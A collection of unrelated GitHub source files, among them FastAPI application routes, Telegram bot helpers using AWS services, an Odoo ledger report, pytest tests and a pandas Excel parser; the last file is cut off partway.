BaseErrors as e:\n await engine.remove(FullTime, FullTime.id == full_time_created.id)\n log.error('BaseErrors')\n raise HTTPException(e.code, e.detail)\n except ValueError as e:\n log.error('ValueError')\n await engine.remove(FullTime, FullTime.id == full_time_created.id)\n raise HTTPException(422, e)\n except Exception as e:\n log.error('Exception')\n log.error(e)\n await engine.remove(FullTime, FullTime.id == full_time_created.id)\n raise HTTPException(422, \"Algo ocurrió mal\")\n application = ApplicationResponse.from_orm(application)\n response = FullTimeResponse(\n **dict(application),\n full_time=full_time_created\n )\n return response\n\n\n@router.get(\"/{id}\", response_model=FullTimeResponse)\nasync def get_full_time(\n id: int,\n *,\n current_user: User = Depends(jwt_bearer.get_current_active_user),\n engine: AIOSession = Depends(mongo_db.get_mongo_db),\n db: Session = Depends(db.get_db)\n) -> FullTimeResponse:\n \"\"\"\n Endpoint to ger a full_time model from mongo\n\n path-params:\n -id: int, this is the id of the application, not of mongo\n\n response:\n -body: full_time\n \"\"\"\n try:\n application = crud.application.get(db, current_user, id=id)\n mongo_id = ObjectId(application.mongo_id)\n if application:\n full_time = await crud.full_time.get(engine, id=mongo_id)\n except BaseErrors as e:\n raise HTTPException(e.code, e.detail)\n application_response = ApplicationResponse.from_orm(application)\n response = FullTimeResponse(\n **dict(application_response),\n full_time=full_time\n )\n return response\n\n\n@router.put(\"/{id}\", status_code=200)\nasync def update_full_time(\n id: int,\n full_time: FullTimeUpdate,\n *,\n current_user: User = Depends(jwt_bearer.get_current_active_user),\n engine: AIOSession = Depends(mongo_db.get_mongo_db),\n db: Session = Depends(db.get_db)\n) -> Application:\n \"\"\"\n Endpoint to update an application of type full_time\n\n params:\n -body: full_timeUpdate\n\n path-params:\n -id: int, this is the id of the application and not the mongo_id\n\n response:\n -body: full_time\n \"\"\"\n\n try:\n # GET In PostgreSQL\n application: Application = crud.application.get(\n db=db, id=id, who=current_user)\n\n if application:\n\n # In MongoDB\n mongo_id = ObjectId(application.mongo_id)\n current_full_time = await crud.full_time.get(engine, id=mongo_id)\n\n updated_full_time = await crud.full_time.update(engine, db_obj=current_full_time, obj_in=full_time)\n\n status = Application_statusCreate(\n application_id=application.id, status_id=1, observation=\"Dedicación exclusiva solicitada\")\n crud.application_status.request(\n db, who=current_user, obj_in=status, to=application, current=current_full_time)\n\n except BaseErrors as e:\n raise HTTPException(e.code, e.detail)\n\n return application\n\n\n@router.delete(\"/{id}\", response_model=Msg)\nasync def delete_full_time(\n id: int,\n *,\n current_user: User = Depends(jwt_bearer.get_current_active_user),\n engine: AIOSession = Depends(mongo_db.get_mongo_db),\n db: Session = Depends(db.get_db)\n) -> Msg:\n \"\"\"\n Endpoint to delete an application of type full_time\n\n params:\n -id: int, this is the id of the application and not of mongo\n\n response:\n -msg: Msg\n \"\"\"\n try:\n # First get the application from postgresql\n application = crud.application.get(db, current_user, id=id)\n # get id from the model sql\n mongo_id = ObjectId(application.mongo_id)\n # Delete object in postgresql\n delete = crud.application.delete(db, current_user, id=id)\n log.debug(delete)\n if delete:\n log.debug('Estamos en delete')\n # delete object on Mongo\n await crud.full_time.delete(engine, id=mongo_id)\n\n except BaseErrors as e:\n raise HTTPException(e.code, e.detail)\n return Msg(msg=\"Comisión eliminada correctamente\")\n\n\n@router.put('/request/{id}')\ndef solicite_full_time(\n id: int,\n *,\n current_user: User = Depends(jwt_bearer.get_current_active_user),\n db: Session = Depends(db.get_db)\n) -> Msg:\n try:\n application = crud.application.get(db, current_user, id=id)\n update = crud.application.update(db, current_user, db_obj=application, obj_in={\n }, status=1, observation='Usuario solocitó dedicación exclusiva')\n except BaseErrors as e:\n raise HTTPException(e.code, e.detail)\n return {'msg': 'La solicitud se solicitó correctamente'}\n\n\n\n@router.put('/letter/{id}')\nasync def update_letter(\n id: int,\n letter: InitialLetter,\n *,\n current_user: User = Depends(jwt_bearer.get_current_active_user),\n engine: AIOSession = Depends(mongo_db.get_mongo_db),\n db: Session = Depends(db.get_db)\n) -> FullTime:\n try:\n application: Application = crud.application.get(\n db, current_user, id=id)\n mongo_id = ObjectId(application.mongo_id)\n full_time = await crud.full_time.get(engine, id=mongo_id)\n log.debug(full_time.documents)\n for document in full_time.documents:\n if document['name'] == 'carta-inicio.pdf':\n try:\n #delete = aws.s3.delete_contents_s3_bucket(settings.aws_bucket_name, file_name=document['path'])\n pass\n except Exception as e:\n pass\n path = await documents.initial_letter_generation(current_user, letter.body)\n full_time = await crud.full_time.letter(engine,\n id=mongo_id, letter=letter)\n await crud.full_time.update_document(engine, id=mongo_id, name='carta-inicio.pdf', path=path)\n\n except BaseErrors as e:\n raise HTTPException(e.code, e.detail)\n return full_time\n\n\n@router.put('/vice-format/{id}')\nasync def update_vice_format(\n id: int,\n vice_format: ViceFormat,\n *,\n current_user: User = Depends(jwt_bearer.get_current_active_user),\n engine: AIOSession = Depends(mongo_db.get_mongo_db),\n db: Session = Depends(db.get_db)\n) -> FullTime:\n try:\n application: Application = crud.application.get(\n db, current_user, id=id)\n mongo_id = ObjectId(application.mongo_id)\n full_time = await crud.full_time.vice_format(engine,\n id=mongo_id, vice_format=vice_format)\n\n path = documents.fill_vice_document(current_user, full_time)\n await crud.full_time.update_document(engine, id=mongo_id, name='formato-vicerrectoría.xlsx', path=path)\n except BaseErrors as e:\n raise HTTPException(e.code, e.detail)\n return full_time\n\n\n@router.put('/work-plan/{id}')\nasync def update_work_plan(\n id: int,\n work_plan: WorkPlan,\n *,\n current_user: User = Depends(jwt_bearer.get_current_active_user),\n engine: AIOSession = Depends(mongo_db.get_mongo_db),\n db: Session = Depends(db.get_db)\n) -> FullTime:\n try:\n application: Application = crud.application.get(\n db, current_user, id=id)\n mongo_id = ObjectId(application.mongo_id)\n full_time = await crud.full_time.work_plan(engine,\n id=mongo_id, work_plan=work_plan)\n path = documents.fill_work_plan_format(current_user, full_time)\n await crud.full_time.update_document(engine, id=mongo_id, name='plan-trabajo', path=path)\n except BaseErrors as e:\n raise HTTPException(e.code, e.detail)\n return full_time\n\n","repo_name":"Equipo-de-desarrollo-FCEN-UDEA/siga","sub_path":"backend/app/api/versions/v1/routes/applications/full_time.py","file_name":"full_time.py","file_ext":"py","file_size_in_byte":9961,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"2076271794","text":"\nfrom xstruct import pack\n\nfrom Header import Processed\n\nclass Resource(Processed):\n\t\"\"\"\\\n\t A Resource Description frame consist of:\n\t\t* a UInt32, Resource ID\n\t\t* a String, singular name of the resource\n\t\t* a String, plural name of the resource\n\t\t* a String, singular name of the resources unit\n\t\t* a String, plural name of the resources unit\n\t\t* a String, description of the resource\n\t\t* a UInt32, weight per unit of resource (0 for not applicable)\n\t\t* a UInt32, size per unit of resource (0 for not applicable)\n\t\t* a UInt64, the last modified time of this resource description\n\t\"\"\"\n\tno = 23\n\tstruct = \"ISSSSSIIT\"\n\n\tdef __init__(self, sequence, id, \\\n\t\t\tname_singular, name_plural, \\\n\t\t\tunit_singular, unit_plural, \\\n\t\t\tdescription, weight, size, modify_time):\n\t\tProcessed.__init__(self, sequence)\n\n\t\t# Length is:\n\t\t#\n\t\tself.length = 4 + \\\n\t\t\t\t4 + len(name_singular) + \\\n\t\t\t\t4 + len(name_plural) + \\\n\t\t\t\t4 + len(unit_singular) + \\\n\t\t\t\t4 + len(unit_plural) + \\\n\t\t\t\t4 + len(description) + \\\n\t\t\t\t4 + 4 + 8\n\n\t\tself.id = id\n\t\tself.name_singular, self.name_plural = name_singular, name_plural\n\t\tself.unit_singular, self.unit_plural = unit_singular, unit_plural\n\t\tself.description, self.weight, self.size, self.modify_time = description, weight, size, modify_time\n\n\tdef name(self):\n\t\treturn self.name_singular\n\tname = property(name)\n\t\n\tdef __str__(self):\n\t\toutput = Processed.__str__(self)\n\t\toutput += pack(self.struct, self.id, \\\n\t\t\tself.name_singular, self.name_plural, \\\n\t\t\tself.unit_singular, self.unit_plural, \\\n\t\t\tself.description, self.weight, self.size, self.modify_time)\n\n\t\treturn output\n","repo_name":"thousandparsec/libtpproto-py","sub_path":"tp/netlib/objects/Resource.py","file_name":"Resource.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"8607035053","text":"import pytest\nfrom swamp.syncmem import SynchronizedMemory\nfrom . import MockTransport\nfrom typing import Callable, List\nfrom swamp.message import SWAMPMessage, MemReset\n\n\n@pytest.fixture\ndef memory():\n transport = MockTransport()\n return SynchronizedMemory(transport, memory_size=8)\n\n\ndef test_synchronized_memory_write_commit(memory):\n \"\"\"Test that writing to the synchronized memory works and commits the transaction.\"\"\"\n memory.write([(3, 0xFF, 42)])\n\n assert memory.memory_cache[3] == 42\n assert memory.memory_committed[3] != 42\n\n memory.transport.process_transaction()\n assert memory.memory_committed[3] == 42\n\n\ndef test_synchronized_memory_write_error(memory):\n \"\"\"Test that writing to the synchronized memory handles transaction errors.\"\"\"\n memory.write([(3, 0xFF, 42)])\n\n assert memory.memory_cache[3] == 42\n assert memory.memory_committed[3] != 42\n\n with pytest.raises(RuntimeError):\n memory.transport.process_transaction(success=False)\n\n assert memory.memory_committed[3] != 42\n\n\ndef test_synchronized_memory_read(memory):\n \"\"\"Test that reading from the synchronized memory works.\"\"\"\n memory.write([(3, 0xFF, 42)])\n memory.transport.process_transaction()\n\n read_val = memory.read(3)\n assert read_val == 42\n\n\ndef test_synchronized_memory_read_committed(memory):\n \"\"\"Test that reading from the committed memory works.\"\"\"\n memory.write([(3, 0xFF, 42)])\n\n with pytest.raises(ValueError):\n memory.read(3, committed=True)\n\n memory.transport.process_transaction()\n\n read_val = memory.read(3, committed=True)\n assert read_val == 42\n\n\ndef test_synchronized_memory_reset(memory):\n \"\"\"Test that resetting the synchronized memory works.\"\"\"\n memory.write([(3, 0xFF, 42)])\n memory.transport.process_transaction()\n\n assert memory.memory_committed[3] == 42\n\n memory.transport.trigger_reset()\n assert memory.memory_committed[3] == 0\n assert memory.memory_cache[3] == 0\n","repo_name":"Phylex/swamp","sub_path":"tests/test_synchronized_mem.py","file_name":"test_synchronized_mem.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8190431977","text":"# -*- coding: utf-8 -*-\n__author__ = 'xiliangma'\n\n\nimport jpype, time, commands, os\nfrom SysConstant import PPD_CLASS_PATH, PPD_CONFIG, PPD_PATH\n\njvmArg = '-Djava.class.path=' + PPD_CLASS_PATH\njvmPath = jpype.getDefaultJVMPath()\n\n\nclass JpypeManager():\n\n def checPPDClient(self):\n errorCode = 0\n jrePath = jvmPath.split(\"server\")[0]\n soPath = jrePath + \"libpgJNI.so\"\n cplibpgJNIComm = \"cp \" + PPD_PATH + \"libpgJNI.so \" + jrePath\n if not os.path.exists(soPath):\n (errorCode, output) = commands.getstatusoutput(cplibpgJNIComm)\n return errorCode\n\n def startJPype(self):\n if not jpype.isJVMStarted():\n jpype.startJVM(jvmPath, jvmArg)\n\n\n def closeJPype(self):\n jpype.shutdownJVM()\n\n\nclass PPDClientManager():\n\n def loginPPDClient(self):\n JDClass = jpype.JClass('com.peergine.tool.pgTunnelSvrTool')\n oTool = JDClass()\n oTool.Run(PPD_CONFIG)\n return oTool\n\n\n# if __name__ == \"__main__\":\n# try:\n# pass\n# # ppdManager = PPDServiceManager()\n# # ppdManager.getPPDClient()\n# # ppdManager.loginPPDClient()\n# # time.sleep(3)\n# # ppdManager.ppdUserList()\n# except Exception as e:\n# print e.message","repo_name":"xiliangMa/AuthServer","sub_path":"backend/utils/PPDServiceManager.py","file_name":"PPDServiceManager.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8873546801","text":"a_list = [1, 2, 3, 4, 5, 6]\n\n# lst = []\n# for i in a_list:\n# lst.append(i*i)\n# print(lst)\n\n# even = []\n# odd = []\n#\n# [even.append(i) if i % 2 == 0 else odd.append(i) for i in a_list]\n#\n# print(even)\n# print(odd)\n\nx = [\"*\" for j in range(2) for i in range(2)]\nprint(x)","repo_name":"TechTouhid/The_Modern_Python_3_Bootcamp","sub_path":"PMC/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26968157115","text":"from abc import ABC\nfrom typing import Any, Union\n\nfrom aiogram import Bot, types\nfrom aiogram.filters import Filter\n\n\nclass IsChatAdmin(Filter, ABC):\n async def __call__(self, event: Union[types.Message, types.CallbackQuery], bot: Bot) -> bool:\n member = await bot.get_chat_member(event.chat.id, event.from_user.id)\n return isinstance(member, types.ChatMemberAdministrator)\n\n\nclass CanPromoteMembers(Filter, ABC):\n async def __call__(self, event: Union[types.Message, types.CallbackQuery], bot: Bot) -> bool:\n member = await bot.get_chat_member(event.chat.id, event.from_user.id)\n return (\n isinstance(member, types.ChatMemberAdministrator)\n and member.can_promote_members\n or isinstance(member, types.ChatMemberOwner)\n )\n\n\nclass ReplyRequired(Filter, ABC):\n def __init__(self, error_message: str = \"Reply to message is required\", notify: bool = True):\n self.error_message = error_message\n self.notify = notify\n\n async def __call__(self, event: types.Message, bot: Bot) -> Union[bool, dict[str, Any]]:\n if event.reply_to_message:\n return {\n \"reply\": event.reply_to_message,\n }\n\n if self.notify:\n await event.answer(self.error_message)\n return False\n","repo_name":"tshipenchko/lklubot","sub_path":"filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"40684951487","text":"from odoo import _, models\n\n\nclass JournalLedgerXslx(models.AbstractModel):\n _name = \"report.a_f_r.report_journal_ledger_xlsx\"\n _description = \"Journal Ledger XLSX Report\"\n _inherit = \"report.account_financial_report.abstract_report_xlsx\"\n\n def _get_report_name(self, report, data=False):\n company_id = data.get(\"company_id\", False)\n report_name = _(\"Journal Ledger\")\n if company_id:\n company = self.env[\"res.company\"].browse(company_id)\n suffix = \" - {} - {}\".format(company.name, company.currency_id.name)\n report_name = report_name + suffix\n return report_name\n\n def _get_report_columns(self, report):\n columns = [\n {\"header\": _(\"Entry\"), \"field\": \"entry\", \"width\": 18},\n {\"header\": _(\"Date\"), \"field\": \"date\", \"width\": 11},\n {\"header\": _(\"Account\"), \"field\": \"account_code\", \"width\": 9},\n ]\n\n if report.with_auto_sequence:\n columns.insert(\n 0, {\"header\": _(\"Sequence\"), \"field\": \"auto_sequence\", \"width\": 10}\n )\n\n if report.with_account_name:\n columns.append(\n {\"header\": _(\"Account Name\"), \"field\": \"account_name\", \"width\": 15}\n )\n\n columns += [\n {\"header\": _(\"Partner\"), \"field\": \"partner\", \"width\": 25},\n {\"header\": _(\"Ref - Label\"), \"field\": \"label\", \"width\": 40},\n {\"header\": _(\"Taxes\"), \"field\": \"taxes_description\", \"width\": 11},\n {\"header\": _(\"Debit\"), \"field\": \"debit\", \"type\": \"amount\", \"width\": 14},\n {\"header\": _(\"Credit\"), \"field\": \"credit\", \"type\": \"amount\", \"width\": 14},\n ]\n\n if report.foreign_currency:\n columns += [\n {\n \"header\": _(\"Currency\"),\n \"field\": \"currency_name\",\n \"width\": 14,\n \"type\": \"currency_name\",\n },\n {\n \"header\": _(\"Amount Currency\"),\n \"field\": \"amount_currency\",\n \"type\": \"amount\",\n \"width\": 18,\n },\n ]\n\n columns_as_dict = {}\n for i, column in enumerate(columns):\n columns_as_dict[i] = column\n return columns_as_dict\n\n def _get_journal_tax_columns(self, report):\n return {\n 0: {\"header\": _(\"Name\"), \"field\": \"tax_name\", \"width\": 35},\n 1: {\"header\": _(\"Description\"), \"field\": \"tax_code\", \"width\": 18},\n 2: {\n \"header\": _(\"Base Debit\"),\n \"field\": \"base_debit\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 3: {\n \"header\": _(\"Base Credit\"),\n \"field\": \"base_credit\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 4: {\n \"header\": _(\"Base Balance\"),\n \"field\": \"base_balance\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 5: {\n \"header\": _(\"Tax Debit\"),\n \"field\": \"tax_debit\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 6: {\n \"header\": _(\"Tax Credit\"),\n \"field\": \"tax_credit\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 7: {\n \"header\": _(\"Tax Balance\"),\n \"field\": \"tax_balance\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n }\n\n def _get_col_count_filter_name(self):\n return 2\n\n def _get_col_count_filter_value(self):\n return 3\n\n def _get_report_filters(self, report):\n target_label_by_value = {\n value: label\n for value, label in self.env[\n \"journal.ledger.report.wizard\"\n ]._get_move_targets()\n }\n\n sort_option_label_by_value = {\n value: label\n for value, label in self.env[\n \"journal.ledger.report.wizard\"\n ]._get_sort_options()\n }\n\n return [\n [_(\"Company\"), report.company_id.name],\n [\n _(\"Date range filter\"),\n _(\"From: %(date_from)s To: %(date_to)s\")\n % ({\"date_from\": report.date_from, \"date_to\": report.date_to}),\n ],\n [\n _(\"Target moves filter\"),\n _(\"%s\") % target_label_by_value[report.move_target],\n ],\n [\n _(\"Entries sorted by\"),\n _(\"%s\") % sort_option_label_by_value[report.sort_option],\n ],\n [\n _(\"Journals\"),\n \", \".join(\n [\n \"{} - {}\".format(report_journal.code, report_journal.name)\n for report_journal in report.journal_ids\n ]\n ),\n ],\n ]\n\n def _generate_report_content(self, workbook, report, data, report_data):\n res_data = self.env[\n \"report.account_financial_report.journal_ledger\"\n ]._get_report_values(report, data)\n group_option = report.group_option\n if group_option == \"journal\":\n for ledger in res_data[\"Journal_Ledgers\"]:\n self._generate_journal_content(\n workbook, report, res_data, ledger, report_data\n )\n elif group_option == \"none\":\n self._generate_no_group_content(workbook, report, res_data, report_data)\n\n def _generate_no_group_content(self, workbook, report, res_data, report_data):\n self._generate_moves_content(\n workbook, \"Report\", report, res_data, res_data[\"Moves\"], report_data\n )\n self._generate_no_group_taxes_summary(workbook, report, res_data, report_data)\n\n def _generate_journal_content(\n self, workbook, report, res_data, ledger, report_data\n ):\n journal = self.env[\"account.journal\"].browse(ledger[\"id\"])\n currency_name = (\n journal.currency_id\n and journal.currency_id.name\n or journal.company_id.currency_id.name\n )\n sheet_name = \"{} ({}) - {}\".format(journal.code, currency_name, journal.name)\n self._generate_moves_content(\n workbook, sheet_name, report, res_data, ledger[\"report_moves\"], report_data\n )\n self._generate_journal_taxes_summary(workbook, ledger, report_data)\n\n def _generate_no_group_taxes_summary(self, workbook, report, res_data, report_data):\n self._generate_taxes_summary(\n workbook, \"Tax Report\", res_data[\"tax_line_data\"], report_data\n )\n\n def _generate_journal_taxes_summary(self, workbook, ledger, report_data):\n journal = self.env[\"account.journal\"].browse(ledger[\"id\"])\n currency_name = (\n journal.currency_id\n and journal.currency_id.name\n or journal.company_id.currency_id.name\n )\n sheet_name = \"Tax - {} ({}) - {}\".format(\n journal.code, currency_name, journal.name\n )\n self._generate_taxes_summary(\n workbook, sheet_name, ledger[\"tax_lines\"], report_data\n )\n\n def _generate_moves_content(\n self, workbook, sheet_name, report, res_data, moves, report_data\n ):\n report_data[\"workbook\"] = workbook\n report_data[\"sheet\"] = workbook.add_worksheet(sheet_name)\n self._set_column_width(report_data)\n\n report_data[\"row_pos\"] = 1\n\n self.write_array_title(sheet_name, report_data)\n report_data[\"row_pos\"] += 2\n\n self.write_array_header(report_data)\n account_ids_data = res_data[\"account_ids_data\"]\n partner_ids_data = res_data[\"partner_ids_data\"]\n currency_ids_data = res_data[\"currency_ids_data\"]\n move_ids_data = res_data[\"move_ids_data\"]\n for move in moves:\n for line in move[\"report_move_lines\"]:\n currency_data = currency_ids_data.get(line[\"currency_id\"], False)\n currency_name = currency_data and currency_data[\"name\"] or \"\"\n account_data = account_ids_data.get(line[\"account_id\"], False)\n account_name = account_data and account_data[\"name\"] or \"\"\n account_code = account_data and account_data[\"code\"] or \"\"\n move_data = move_ids_data.get(line[\"move_id\"], False)\n move_entry = move_data and move_data[\"entry\"] or \"\"\n line[\"partner\"] = self._get_partner_name(\n line[\"partner_id\"], partner_ids_data\n )\n line[\"auto_sequence\"] = line[\"auto_sequence\"]\n line[\"account_code\"] = account_code\n line[\"account_name\"] = account_name\n line[\"currency_name\"] = currency_name\n line[\"entry\"] = move_entry\n line[\"taxes_description\"] = report._get_ml_tax_description(\n line,\n res_data[\"tax_line_data\"].get(line[\"tax_line_id\"]),\n res_data[\"move_line_ids_taxes_data\"].get(\n line[\"move_line_id\"], False\n ),\n )\n self.write_line_from_dict(line, report_data)\n report_data[\"row_pos\"] += 1\n\n def _generate_taxes_summary(\n self, workbook, sheet_name, tax_lines_dict, report_data\n ):\n report_data[\"workbook\"] = workbook\n report_data[\"sheet\"] = workbook.add_worksheet(sheet_name)\n\n report_data[\"row_pos\"] = 1\n self.write_array_title(sheet_name, report_data)\n report_data[\"row_pos\"] += 2\n\n def _get_partner_name(self, partner_id, partner_data):\n if partner_id in partner_data.keys():\n return partner_data[partner_id][\"name\"]\n else:\n return \"\"\n","repo_name":"OCA/account-financial-reporting","sub_path":"account_financial_report/report/journal_ledger_xlsx.py","file_name":"journal_ledger_xlsx.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"31"} +{"seq_id":"41130296955","text":"\"\"\"\n if not call queue.task_done, task_queue.join() will hang there\n So task_done should be called after one item get from the queue had been processed\n\"\"\"\nfrom queue import Queue\nimport threading\n\n\nclass Consumer(threading.Thread):\n def __init__(self, tasks):\n threading.Thread.__init__(self)\n self.queue = tasks\n\n def run(self):\n while True:\n # using queue empty to exit consumer\n if self.queue.empty():\n break\n task = self.queue.get()\n print(task)\n self.queue.task_done()\n\n\nif __name__ == \"__main__\":\n task_queue = Queue()\n for i in range(6):\n task_queue.put(i)\n\n for i in range(5):\n t = Consumer(task_queue)\n t.start()\n\n task_queue.join()\n print(\"join called\")\n\n","repo_name":"xiangtian/pytest","sub_path":"queue_usage.py","file_name":"queue_usage.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9135310608","text":"# -- coding: utf-8 --\n\nimport os\nimport telepot\nimport json\nimport botocore.session\n\ndef create_client(client):\n aws_key_id = os.environ['ACCESS_KEY_ID']\n aws_key_secret = os.environ['SECRET_ACCESS_KEY']\n aws_region = os.environ['REGION']\n #log.debug('key: %s, secret: %s, region: %s', aws_key_id, aws_key_secret, aws_region)\n session = botocore.session.get_session()\n return session.create_client(client, region_name=aws_region,\n aws_secret_access_key=aws_key_secret,\n aws_access_key_id=aws_key_id)\n\nclass SQSHelper:\n __sqs = None\n __queue_url = None\n def __init__(self):\n if not SQSHelper.__sqs:\n SQSHelper.__sqs = create_client('sqs')\n SQSHelper.__queue_url = SQSHelper.__sqs.create_queue(QueueName='gpswatch-queue')['QueueUrl']\n self.client = SQSHelper.__sqs\n self.url = SQSHelper.__queue_url\n\n def send_message(self, msg):\n self.client.send_message(QueueUrl=self.url, MessageBody=msg)\n\nclass DynamoHelper:\n __dynamo = None\n def __init__(self):\n if not DynamoHelper.__dynamo:\n DynamoHelper.__dynamo = create_client('dynamodb')\n self.client = DynamoHelper.__dynamo\n\n def get_object(self, key, ts):\n res = self.client.get_item(\n TableName='gpswatch',\n Key={'device_id': {'S': key}, 'ts': {'N': '%s'%ts}},\n ConsistentRead=True,\n )\n return res.get('Item')\n\n def get_settings(self, key):\n return self.get_object(key, 0)\n\n \n def send_message(self, msg):\n self.client.put_item(\n TableName='gpswatch',\n Item=msg.to_dynamo()\n )\n \n SQSHelper().send_message(json.dumps({'id': msg.identifier, 'cmd': msg.cmd, 'direction': msg.direction}))\n\n def update_settings(self, key, expression, values):\n self.client.update_item(\n TableName='gpswatch',\n Key={'device_id': {'S': key}, 'ts': {'N': '0'}},\n UpdateExpression=expression,\n ExpressionAttributeValues=values)\n\n\n def active_devices(self, user_id):\n res = self.get_settings('TEL_%s'%user_id)\n return res['watches_device_id']['SS'] if res else None\n\n\n def query(self, **kwargs):\n while True:\n res = self.client.query(\n TableName='gpswatch',\n **kwargs\n )\n for item in res['Items']:\n yield item\n \n if 'LastEvaluatedKey' in res:\n kwargs['ExclusiveStartKey'] = res['LastEvaluatedKey']\n else:\n break\n\n\nbot = telepot.Bot(os.environ['BOT_KEY'])\n","repo_name":"dimonb/gpswatch","sub_path":"telegram/functions/webhook/handlers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"73345678167","text":"import pytest\n\nfrom indico.modules.categories import Category\n\nfrom indico_livesync.models.queue import ChangeType, LiveSyncQueueEntry\nfrom indico_livesync.util import get_excluded_categories, obj_ref\n\n\nCATEGORY_PARENTS = {\n 0: None,\n 1: 0,\n 2: 0,\n 3: 2,\n 4: 3,\n 5: 3\n}\n\n\n@pytest.mark.usefixtures('dummy_agent')\ndef test_excluded_categories(mocker, monkeypatch, db, create_category):\n \"\"\"Test if category exclusions work.\"\"\"\n plugin = mocker.patch('indico_livesync.plugin.LiveSyncPlugin')\n plugin.settings.get.return_value = [{'id': 2}, {'id': 3}]\n\n categories = {}\n with db.session.no_autoflush:\n for cat_id in range(6):\n category = (create_category(cat_id, title=str(cat_id), protection_mode=0,\n parent=categories[CATEGORY_PARENTS[cat_id]])\n if cat_id else Category.get_root())\n categories[cat_id] = category\n db.session.add(category)\n db.session.flush()\n\n db.session.flush()\n\n for cat in categories.values():\n db = mocker.patch('indico_livesync.models.queue.db')\n LiveSyncQueueEntry.create({ChangeType.created}, obj_ref(cat), excluded_categories=get_excluded_categories())\n assert db.session.add.called == (cat.id not in {2, 3, 4, 5})\n","repo_name":"indico/indico-plugins","sub_path":"livesync/tests/queue_test.py","file_name":"queue_test.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"31"} +{"seq_id":"34969207211","text":"import pandas as pd\nimport gensim\nmodel = gensim.models.KeyedVectors.load_word2vec_format(\n 'Dataset/GoogleNews-vectors-negative300.bin', binary=True)\ndf = pd.read_csv('Dataset/wordsim353/combined.csv')\nsim = []\nfor i in range(len(df)):\n line = df.iloc[i]\n sim.append(model.similarity(line['Word 1'], line['Word 2']))\ndf['w2v'] = sim\nprint(df[['Human (mean)', 'w2v']].corr(method='spearman'))\n","repo_name":"yanamt/NLP-100knock","sub_path":"7shou/7-66.py","file_name":"7-66.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13863889364","text":"import pandas as pd\nimport numpy as np\nfrom pprint import pprint\nimport streamlit as st\nimport plotly.express as px \nimport plotly.graph_objects as go\nimport plotly.io as pio\n\n\ndef extractFormatDataFromExcel(filename: str, sheet_name: str)-> pd.DataFrame:\n # Read in data from excel file\n df_raw = pd.read_excel(filename, sheet_name=sheet_name)\n\n # Remove empty cells at the top\n df_raw = df_raw.iloc[2:,:]\n df = df_raw.copy()\n # Drop NA columns/rows if all are empty \n df.dropna(axis = 0, how = 'all', inplace=True)\n df.dropna(axis = 1, how = 'all', inplace=True)\n # Reset index to increase monotonically from 0\n df.reset_index(drop=True, inplace=True)\n\n # Unnamed: 1 is the column with the profession indexes\n # Unnamed: 2 is the column with the profession names \n # Unnamed: 3-131 are the columns with the profession stats\n # With year and quarter in the first and second rows\n df.rename(columns={\"Unnamed: 1\": \"Profession Index\"}, inplace=True)\n df.rename(columns={\"Unnamed: 2\": \"Profession Name\"}, inplace=True)\n\n # Column 1 - 61 --> profession stats start\n # Drop all rows (after date information) with NA for profession index (white space in Exel)\n df = df[(df['Profession Name'].notna()) | (df.index < 2)].reset_index(drop=True)\n\n # Fill year columns that are empty with last non NA value\n df.iloc[0][:].ffill(inplace=True)\n\n # Re-index dataframe so that the profession index is the index\n df.set_index(\"Profession Index\", inplace=True)\n # Drop totals (contain string like \"G-S\")\n # Ensure column is string type\n # str.contains cannot handle NaN values, so fill them with empty string\n df = df[~df.iloc[:,0].astype(str).fillna('').str.contains(\"-\")]\n # Then remove this column (don't need it anymore, can uniquely identify profession by index)\n # Effectively remove the first column, as the profession indices are now the index\n df = df.iloc[:, 1:]\n\n # df = df.Year.apply(axis=1, func=lambda x: str(x) + \" Q\" + str(df.Quarter)))\n # Transpose dataframe so that profession indices are columns\n df = df.transpose()\n # Rename year and quarter columns\n df.rename(columns={\"Industries\\n Sections and Departments\": \"Year\"}, inplace=True)\n df.rename(columns={np.nan: \"Quarter\"}, inplace=True)\n # Reformat year and quarter columns ready for datetime conversion\n # Quarterly information mapped to first month in quarter for datetime formatting\n quarter_mapping = {\"I\": \"01\", \"II\": \"04\", \"III\": \"07\", \"IV\": \"10\"}\n df.Quarter = df.Quarter.map(quarter_mapping)\n df = df.assign(Period = df.Year.astype(str) + \"-\" + df.Quarter)\n # Drop year and quarter columns \n df.drop([\"Year\", \"Quarter\"], axis=1, inplace=True)\n\n # Remove Profession Name row before converting Period to datetime\n # Store information in a dictionary\n reference_df = df.iloc[0:1].T.drop(\"Period\")\n df.drop(\"Profession Name\", axis=0, inplace=True)\n # Convert Period column to datetime type\n df.Period = pd.to_datetime(df.Period, format='%Y-%m')\n # Set Period column as index\n df.set_index(\"Period\", inplace=True)\n\n return df\n\nif __name__ == \"__main__\":\n\n total_df = 